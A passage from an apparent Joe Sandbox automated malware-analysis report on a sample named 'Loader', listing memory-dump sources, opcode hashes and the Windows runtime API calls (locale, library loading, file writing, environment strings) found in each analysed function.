                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 3736152602-0
                                                                                                                • Opcode ID: 5b0c39710e936441b2d78fababf9c812dbed5145ed51319235118fbae4040892
                                                                                                                • Instruction ID: e0ac937e266809a6f951e247eb54fee21d53914a6ecdb75cfabc117511972f9a
                                                                                                                • Opcode Fuzzy Hash: 5b0c39710e936441b2d78fababf9c812dbed5145ed51319235118fbae4040892
                                                                                                                • Instruction Fuzzy Hash: 0911C272610206EBDB14AB28DC52ABE77E8EF05320B11417BE615D7341EB38ED019B50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • EnumSystemLocalesW.KERNEL32(00CDAD30,00000001,00000000,?,-00000050,?,00CDAB13,00000000,-00000002,00000000,?,00000055,?), ref: 00CDACFA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2417226690-0
                                                                                                                • Opcode ID: b373ef13e7733e5769c311b287bd67f842afb9729598239bbdaf8c0b91e7ccd7
                                                                                                                • Instruction ID: 716b5854e556ab33ef30369e592000731640b670c39260987a3e09f71cb030c2
                                                                                                                • Opcode Fuzzy Hash: b373ef13e7733e5769c311b287bd67f842afb9729598239bbdaf8c0b91e7ccd7
                                                                                                                • Instruction Fuzzy Hash: 5E110C372107019FDB189F39C89167AB792FF84369B19442EEA5787B40D771B943D740
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CDAF4C,00000000,00000000,?), ref: 00CDB2E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 3736152602-0
                                                                                                                • Opcode ID: 5c558639fcaacd6c428572614aabeb731dc9df65b4a14a706766d0d1ca4a7c2a
                                                                                                                • Instruction ID: 2e6a5a06dc4e47dd21054a96a75b9379ec65736dc95400a3d1a581e379ec1a95
                                                                                                                • Opcode Fuzzy Hash: 5c558639fcaacd6c428572614aabeb731dc9df65b4a14a706766d0d1ca4a7c2a
                                                                                                                • Instruction Fuzzy Hash: 0E01FE36610512EBDB285A25CC467FF7754EB40754F56442AEE16A3390DF30FF41E690
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • EnumSystemLocalesW.KERNEL32(00CDAFF0,00000001,?,?,-00000050,?,00CDAADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CDAFCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2417226690-0
                                                                                                                • Opcode ID: c2387a022d2c43acec41ec0ce6e96fcecf25427c1a0232d1e2808a70a76d5e49
                                                                                                                • Instruction ID: 16bca04db8f6054d5b170c48465bb58837e1ca0de54a303f748487b89de492b9
                                                                                                                • Opcode Fuzzy Hash: c2387a022d2c43acec41ec0ce6e96fcecf25427c1a0232d1e2808a70a76d5e49
                                                                                                                • Instruction Fuzzy Hash: 45F046762003045FCB245F79D881A7ABBD1EF80368B05446EFA064B780C7719D02D610
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD1D11: EnterCriticalSection.KERNEL32(?,?,00CD5DD8,?,00CEFC38,00000008,00CD5CCA,00000000,00000000,?), ref: 00CD1D20
                                                                                                                • EnumSystemLocalesW.KERNEL32(00CD68F0,00000001,00CEFCB8,0000000C,00CD62F1,-00000050), ref: 00CD6935
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1272433827-0
                                                                                                                • Opcode ID: 3a87c1a2bcf279c095bc947c00fc6540ec240aa6b8e8e85e677bd54b2d6251bf
                                                                                                                • Instruction ID: 14b7bb9ecc3c744297d85138a871eb708befc8cf2ab40ab49df02fc02893bba0
                                                                                                                • Opcode Fuzzy Hash: 3a87c1a2bcf279c095bc947c00fc6540ec240aa6b8e8e85e677bd54b2d6251bf
                                                                                                                • Instruction Fuzzy Hash: 90F03776A00204EFD710EFA8E842BAC77F0EB08721F10802AF9119B2E1CB755905DF41
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • EnumSystemLocalesW.KERNEL32(00CDB110,00000001,?,?,?,00CDAB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CDB0FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2417226690-0
                                                                                                                • Opcode ID: ab8e99663ab60602f4ab6573ba142bbea3e130834a6c6fc625282b5bbe1ba0ad
                                                                                                                • Instruction ID: d9ff94fa078ce99b31acb1021d7a8699b140a079fec903d11507c3b1b3604c4d
                                                                                                                • Opcode Fuzzy Hash: ab8e99663ab60602f4ab6573ba142bbea3e130834a6c6fc625282b5bbe1ba0ad
                                                                                                                • Instruction Fuzzy Hash: CAF0203630020997CB049B39C86566A7B94EBC1760B0B405EEB098B280C6319D42C790
                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CD0A63,?,20001004,00000000,00000002,?,?,00CCF971), ref: 00CD6429
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: 243629c0de76b2539fa798d0a2d6332bc616cc87fce0fa9fa6931ad27a0fb18c
                                                                                                                • Instruction ID: a609435f530a2f4285313b4b4293f3d3b29251105debaca985087fed0c95dd62
                                                                                                                • Opcode Fuzzy Hash: 243629c0de76b2539fa798d0a2d6332bc616cc87fce0fa9fa6931ad27a0fb18c
                                                                                                                • Instruction Fuzzy Hash: 95E04F3550026CBBCF126F61DC05FAE7F5AEF48790F048022FE0566361CB318D20EA91
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00CC9A6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 513ed9a4f91d6243c1700b77a984f1dc1bc9fc99a79f0b0fe9437e0681077aa5
                                                                                                                • Instruction ID: 912a1fc000e371ecdd7c6c990689a00d141b4320fa905564c9c6952963b7b17f
                                                                                                                • Opcode Fuzzy Hash: 513ed9a4f91d6243c1700b77a984f1dc1bc9fc99a79f0b0fe9437e0681077aa5
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 080f85c1611164c5ae251785a78c2dc4e2e08ef6bd52ef63ca87e65166dd7a52
                                                                                                                • Instruction ID: 90025941bedcb1e6800a2dc4df6294398295f57a9c8c524bf2fc379393342888
                                                                                                                • Opcode Fuzzy Hash: 080f85c1611164c5ae251785a78c2dc4e2e08ef6bd52ef63ca87e65166dd7a52
                                                                                                                • Instruction Fuzzy Hash: 15A02230200202CFE3008F3ABE88F0C3BE8EA022C030E80A8E800C80B0EB308080EF03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                                • Instruction ID: f09b3633338d12160ccde477e2175bcc3e9de1d04db047e184a1069ed48ca42b
                                                                                                                • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                                • Instruction Fuzzy Hash: 03025FB1E002599BDF14CFA9D9806AEF7F1FF48314F15826AE615E7380D731AA41CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f4fcb3c54eb2a5a6d7730287255226edb0e05290f15c0267366bbb4e5d3e68af
                                                                                                                • Instruction ID: 79e62d1b0d2bf014e915cccdff4962edf50acd283e96628c3de7a9ba53efb8bb
                                                                                                                • Opcode Fuzzy Hash: f4fcb3c54eb2a5a6d7730287255226edb0e05290f15c0267366bbb4e5d3e68af
                                                                                                                • Instruction Fuzzy Hash: 0DD06C3A641A58AFC210CF49E440E41F7A8FB8A670B154166EA4893B20C331F811CAE0
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F876D5F9,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF22D
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CCF23F
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF261
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
                                                                                                                • Instruction ID: 51fe5f837b2f135867c6f83b3ae652e277899cee35f8cb93577663868d64b91e
                                                                                                                • Opcode Fuzzy Hash: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
                                                                                                                • Instruction Fuzzy Hash: CE01A235940699AFDB119B54DC49FAEBBB9FB04B55F040639F821A62D0DB749900CA80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d5dd931abb98a2af702599b9199d7d693cf5ed82371373e01fe11bfd67f5bc5
                                                                                                                • Instruction ID: 0c42690a5293a3ac0271bf4a51ba46008a5e67c5c317d6596c9e33a8351006d6
                                                                                                                • Opcode Fuzzy Hash: 8d5dd931abb98a2af702599b9199d7d693cf5ed82371373e01fe11bfd67f5bc5
                                                                                                                • Instruction Fuzzy Hash: 78B11371A042C9AFDB11DFAAC885BBEBBB1BF45310F144159E9259B392C770AF41CB60
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC), ref: 00CDF6BD
                                                                                                                • GetLastError.KERNEL32(?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC,00000000,?,00CD539C), ref: 00CDF6C7
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CDF6EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                • Opcode ID: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
                                                                                                                • Instruction ID: a6e6a6bdbff0a587afffd36758e777df52815c18fd78f530e4cd1be447f1fecf
                                                                                                                • Opcode Fuzzy Hash: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
                                                                                                                • Instruction Fuzzy Hash: 4FE04831250245B7FB201B61EC4AF5C3BD5EF00B94F240031FB0DA85F1DBA2DA52A584
                                                                                                                APIs
                                                                                                                • GetConsoleOutputCP.KERNEL32(F876D5F9,00000000,00000000,?), ref: 00CDD7B1
                                                                                                                  • Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CDDA03
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CDDA49
                                                                                                                • GetLastError.KERNEL32 ref: 00CDDAEC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 2112829910-0
                                                                                                                • Opcode ID: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
                                                                                                                • Instruction ID: 3f1b8f3fc431f1d241885f0922b159d14a88d26990f25db49c429096bb3fda57
                                                                                                                • Opcode Fuzzy Hash: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
                                                                                                                • Instruction Fuzzy Hash: 0BD16B75D042499FCF15CFA8D880AEDBBB9FF08314F28816AE56AEB351D730A941DB50
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00CDC976
                                                                                                                  • Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9AE
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
